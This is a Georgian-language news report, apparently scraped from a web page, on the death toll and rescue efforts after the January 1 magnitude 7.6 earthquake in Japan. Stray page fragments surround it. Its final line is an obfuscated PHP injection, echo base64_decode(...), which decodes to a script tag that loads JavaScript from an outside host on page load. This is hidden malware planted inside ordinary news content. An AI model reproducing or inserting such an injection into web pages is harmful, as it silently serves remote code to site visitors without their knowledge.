celsiusi
ავერსი შნაიდერი

 იაპონიაში მიწისძვრის შედეგად დაღუპულთა რაოდენობა 84-მდე გაიზარდა.

როგორც „როიტერი“ იუწყება, ათასობით მაშველი ამ დრომდე იმყოფება სტიქიური უბედურების ზონაში და ნანგრევებში მოყოლილი ადამიანების პოვნას ცდილობს.

ქვეყნის პრემიერ-მინისტრმა, ფუმიო კიშიდამ განაცხადა, რომ სამაშველო ოპერაცია სტიქიიდან 72 საათის შემდეგაც გაგრძელდება.

„როიტერის“ ცნობით, ამ დრომდე მაშველებმა 156 ადამიანის გადარჩენა შეძლეს, კიდევ 79 ადამიანი კი დაკარგულად ითვლება.

მიწისძვრის შედეგად მიყენებული ზუსტი ზიანი ამ ეტაპზე უცნობი რჩება, რადგან მაშველები ამ დრომდე ვერ ჩადიან სტიქიის შედეგად დაზარალებული დასახლებების ნაწილში.

იშიკავას პრეფექტურაში აცხადებენ, რომ მიწისძვრიდან სამი დღის შემდეგაც 30 სოფელი გარე სამყაროს მოწყვეტილია. ამის გამო დროებით თავშესაფრებში მყოფი მოქალაქეების ნაწილი წყლის, სურსათის, ელექტროენერგიისა და საკომუნიკაციო საშუალებების გარეშეა დარჩენილი. ამასთან, არის ცუდი მეტეოროლოგიური პირობები და ყინვა, რაც დაზარალებულთა მდგომარეობას ართულებს.

იაპონიაში 7,6 მაგნიტუდის მიწისძვრა პირველ იანვარს მოხდა.

178
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");